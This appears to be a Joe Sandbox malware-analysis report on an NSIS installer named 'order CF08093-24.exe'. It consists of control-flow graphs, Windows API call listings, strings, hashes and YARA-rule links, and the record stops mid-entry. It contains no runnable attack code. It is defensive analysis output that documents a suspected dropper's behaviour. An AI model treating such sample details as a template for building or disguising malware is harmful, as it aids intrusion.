                                                                            control_flow_graph 509 401794-4017b9 call 402dcb call 405e87 514 4017c3-4017d5 call 406541 call 405e10 lstrcatW 509->514 515 4017bb-4017c1 call 406541 509->515 520 4017da-4017db call 4067ef 514->520 515->520 524 4017e0-4017e4 520->524 525 4017e6-4017f0 call 40689e 524->525 526 401817-40181a 524->526 533 401802-401814 525->533 534 4017f2-401800 CompareFileTime 525->534 528 401822-40183e call 406031 526->528 529 40181c-40181d call 40600c 526->529 536 401840-401843 528->536 537 4018b2-4018db call 4055c6 call 4032d9 528->537 529->528 533->526 534->533 538 401894-40189e call 4055c6 536->538 539 401845-401883 call 406541 * 2 call 40657e call 406541 call 405ba1 536->539 549 4018e3-4018ef SetFileTime 537->549 550 4018dd-4018e1 537->550 551 4018a7-4018ad 538->551 539->524 571 401889-40188a 539->571 554 4018f5-401900 CloseHandle 549->554 550->549 550->554 555 402c58 551->555 557 401906-401909 554->557 558 402c4f-402c52 554->558 559 402c5a-402c5e 555->559 561 40190b-40191c call 40657e lstrcatW 557->561 562 40191e-401921 call 40657e 557->562 558->555 568 401926-4023c7 call 405ba1 561->568 562->568 568->559 575 402953-40295a 568->575 571->551 573 40188c-40188d 571->573 573->538 575->558
                                                                            APIs
                                                                            • lstrcatW.KERNEL32(00000000,00000000,32079,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes,?,?,00000031), ref: 004017D5
                                                                            • CompareFileTime.KERNEL32(-00000014,?,32079,32079,00000000,00000000,32079,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes,?,?,00000031), ref: 004017FA
                                                                              • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                              • Part of subcall function 004055C6: lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                              • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                              • Part of subcall function 004055C6: lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                                                              • Part of subcall function 004055C6: SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                              • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                            • String ID: 32079$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes$hadefuldeste\optjeningers\hottish
                                                                            • API String ID: 1941528284-1322005942
                                                                            • Opcode ID: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                                            • Instruction ID: 43cdcdb3dd666cfde73f7e2270c9ebc879cf542ec353fd5a36f292582218c0dc
                                                                            • Opcode Fuzzy Hash: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
                                                                            • Instruction Fuzzy Hash: 0141B431910604BACB117BA9DD86DBE3AB5EF45329F21427FF412B10E1CB3C8A91966D
                                                                            Function 004055C6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 576 4055c6-4055db 577 4055e1-4055f2 576->577 578 405692-405696 576->578 579 4055f4-4055f8 call 40657e 577->579 580 4055fd-405609 lstrlenW 577->580 579->580 582 405626-40562a 580->582 583 40560b-40561b lstrlenW 580->583 585 405639-40563d 582->585 586 40562c-405633 SetWindowTextW 582->586 583->578 584 40561d-405621 lstrcatW 583->584 584->582 587 405683-405685 585->587 588 40563f-405681 SendMessageW * 3 585->588 586->585 587->578 589 405687-40568a 587->589 588->587 589->578
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                            • lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                            • lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                                                            • SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                            • String ID: daniglacial
                                                                            • API String ID: 2531174081-766043870
                                                                            • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                            • Instruction ID: 832834c51e0bf9a0f82df7ca1b5cea98aaac4e2da268f37eaeed00ca70cd3c8d
                                                                            • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                            • Instruction Fuzzy Hash: BA21A175900558BACB119FA5DD84DCFBF79EF45350F50843AF904B22A0C77A4A41CF58
                                                                            Function 004032D9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 590 4032d9-4032f0 591 4032f2 590->591 592 4032f9-403301 590->592 591->592 593 403303 592->593 594 403308-40330d 592->594 593->594 595 40331d-40332a call 4034be 594->595 596 40330f-403318 call 4034d4 594->596 600 403330-403334 595->600 601 403475 595->601 596->595 603 40333a-40335a GetTickCount call 406a90 600->603 604 40345e-403460 600->604 602 403477-403478 601->602 605 4034b7-4034bb 602->605 616 4034b4 603->616 618 403360-403368 603->618 606 403462-403465 604->606 607 4034a9-4034ad 604->607 609 403467 606->609 610 40346a-403473 call 4034be 606->610 611 40347a-403480 607->611 612 4034af 607->612 609->610 610->601 623 4034b1 610->623 614 403482 611->614 615 403485-403493 call 4034be 611->615 612->616 614->615 615->601 627 403495-4034a1 call 4060e3 615->627 616->605 621 40336a 618->621 622 40336d-40337b call 4034be 618->622 621->622 622->601 628 403381-40338a 622->628 623->616 633 4034a3-4034a6 627->633 634 40345a-40345c 627->634 630 403390-4033ad call 406ab0 628->630 636 4033b3-4033ca GetTickCount 630->636 637 403456-403458 630->637 633->607 634->602 638 403415-403417 636->638 639 4033cc-4033d4 636->639 637->602 642 403419-40341d 638->642 643 40344a-40344e 638->643 640 4033d6-4033da 639->640 641 4033dc-40340d MulDiv wsprintfW call 4055c6 639->641 640->638 640->641 650 403412 641->650 646 403432-403438 642->646 647 40341f-403424 call 4060e3 642->647 643->618 644 403454 643->644 644->616 649 40343e-403442 646->649 651 403429-40342b 647->651 649->630 652 403448 649->652 650->638 651->634 653 40342d-403430 651->653 652->616 653->649
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CountTick$wsprintf
                                                                            • String ID: ... %d%%
                                                                            • API String ID: 551687249-2449383134
                                                                            • Opcode ID: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                                            • Instruction ID: 37f968fffa50e4a1d2003f203ee40286d056d648d4267fa9fd8a089c231f80ea
                                                                            • Opcode Fuzzy Hash: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
                                                                            • Instruction Fuzzy Hash: 39517E71900219EBCB11DF65D944BAF3FA8AF40766F14417BF804BB2C1D7789E408BA9
                                                                            Function 004068C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 654 4068c5-4068e5 GetSystemDirectoryW 655 4068e7 654->655 656 4068e9-4068eb 654->656 655->656 657 4068fc-4068fe 656->657 658 4068ed-4068f6 656->658 660 4068ff-406932 wsprintfW LoadLibraryExW 657->660 658->657 659 4068f8-4068fa 658->659 659->660
                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                                                            • wsprintfW.USER32 ref: 00406917
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                            • String ID: %s%S.dll$UXTHEME
                                                                            • API String ID: 2200240437-1106614640
                                                                            • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                            • Instruction ID: 5a11031caceee5166790be9fdf4905626ac305c011281564bfcfed8699633c36
                                                                            • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                            • Instruction Fuzzy Hash: 4FF0FC31501219A6CF10BB68DD0DF9B375C9B00304F10847EA546F10E0EB78D768C798
                                                                            Function 00406060 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 661 406060-40606c 662 40606d-4060a1 GetTickCount GetTempFileNameW 661->662 663 4060b0-4060b2 662->663 664 4060a3-4060a5 662->664 666 4060aa-4060ad 663->666 664->662 665 4060a7 664->665 665->666
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 0040607E
                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040351A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806), ref: 00406099
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                            • API String ID: 1716503409-44229769
                                                                            • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                            • Instruction ID: 6ac4114a0c6328616d68196ae331b9967fc339ed7b26ce04d623ba2336a1d7a6
                                                                            • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                            • Instruction Fuzzy Hash: D4F09076B40204BBEB00CF69ED05F9FB7ACEB95750F11803AFA01F7180E6B099548768
                                                                            Function 004015E6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 750 4015e6-4015fa call 402dcb call 405ebb 755 401656-401659 750->755 756 4015fc-40160f call 405e3d 750->756 758 401688-40231b call 401423 755->758 759 40165b-40167a call 401423 call 406541 SetCurrentDirectoryW 755->759 763 401611-401614 756->763 764 401629-40162c call 405aef 756->764 772 402c4f-402c5e 758->772 759->772 779 401680-401683 759->779 763->764 768 401616-40161d call 405b0c 763->768 771 401631-401633 764->771 768->764 783 40161f-401627 call 405a95 768->783 775 401635-40163a 771->775 776 40164c-401654 771->776 780 401649 775->780 781 40163c-401647 GetFileAttributesW 775->781 776->755 776->756 779->772 780->776 781->776 781->780 783->771
                                                                            APIs
                                                                              • Part of subcall function 00405EBB: CharNextW.USER32(?,?,00425710,?,00405F2F,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\order CF08093-24.exe"), ref: 00405EC9
                                                                              • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                                                              • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                                              • Part of subcall function 00405A95: CreateDirectoryW.KERNEL32(0042C800,?), ref: 00405AD7
                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes,?,00000000,000000F0), ref: 00401672
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes, xrefs: 00401665
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes
                                                                            • API String ID: 1892508949-2464104712
                                                                            • Opcode ID: c6adeddc9a0f3146ad326abe4ad94d0b73c70f6bd455b8f7f02732671ca1c312
                                                                            • Instruction ID: 707209c2395922376f9f001c82b8f9212c950a3f0646f554414056ec45e3a30b
                                                                            • Opcode Fuzzy Hash: c6adeddc9a0f3146ad326abe4ad94d0b73c70f6bd455b8f7f02732671ca1c312
                                                                            • Instruction Fuzzy Hash: DC11B231504514EBDF206FA5CD415AF36B0EF14368B25493FE942B22F1D63E4A81DA9D
                                                                            Function 00407094 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 790 407094-40709a 791 40709c-40709e 790->791 792 40709f-4070bd 790->792 791->792 793 407390-40739d 792->793 794 4072cb-4072e0 792->794 795 4073c7-4073cb 793->795 796 4072e2-4072f8 794->796 797 4072fa-407310 794->797 799 40742b-40743e 795->799 800 4073cd-4073ee 795->800 798 407313-40731a 796->798 797->798 803 407341 798->803 804 40731c-407320 798->804 805 407347-40734d 799->805 801 4073f0-407405 800->801 802 407407-40741a 800->802 806 40741d-407424 801->806 802->806 803->805 807 407326-40733e 804->807 808 4074cf-4074d9 804->808 810 406af2 805->810 811 4074fa 805->811 813 4073c4 806->813 814 407426 806->814 807->803 812 4074e5-4074f8 808->812 816 406af9-406afd 810->816 817 406c39-406c5a 810->817 818 406b9e-406ba2 810->818 819 406c0e-406c12 810->819 815 4074fd-407501 811->815 812->815 813->795 823 4073a9-4073c1 814->823 824 4074db 814->824 816->812 825 406b03-406b10 816->825 817->794 821 406ba8-406bc1 818->821 822 40744e-407458 818->822 826 406c18-406c2c 819->826 827 40745d-407467 819->827 828 406bc4-406bc8 821->828 822->812 823->813 824->812 825->811 829 406b16-406b5c 825->829 830 406c2f-406c37 826->830 827->812 828->818 831 406bca-406bd0 828->831 832 406b84-406b86 829->832 833 406b5e-406b62 829->833 830->817 830->819 834 406bd2-406bd9 831->834 835 406bfa-406c0c 831->835 838 406b94-406b9c 832->838 839 406b88-406b92 832->839 836 406b64-406b67 GlobalFree 833->836 837 406b6d-406b7b GlobalAlloc 833->837 840 406be4-406bf4 GlobalAlloc 834->840 841 406bdb-406bde GlobalFree 834->841 835->830 836->837 837->811 842 406b81 837->842 838->828 839->838 839->839 840->811 840->835 841->840 842->832
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                                            • Instruction ID: 57bf2fd90c69a3a2134d3ca1d9604f9a54cf20ddad3feead76618616929b2f58
                                                                            • Opcode Fuzzy Hash: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                                            • Instruction Fuzzy Hash: 17A15471E04229CBDF28CFA8C8546ADBBB1FF44305F10846ED816BB281D7786A86DF45
                                                                            Function 00407295 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051534296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051520309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051565945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                                                            • Instruction ID: 6b1c66eb9f97b1ade68f1d395623a9ed29f1776dbc94043a645b3c6b65beda35
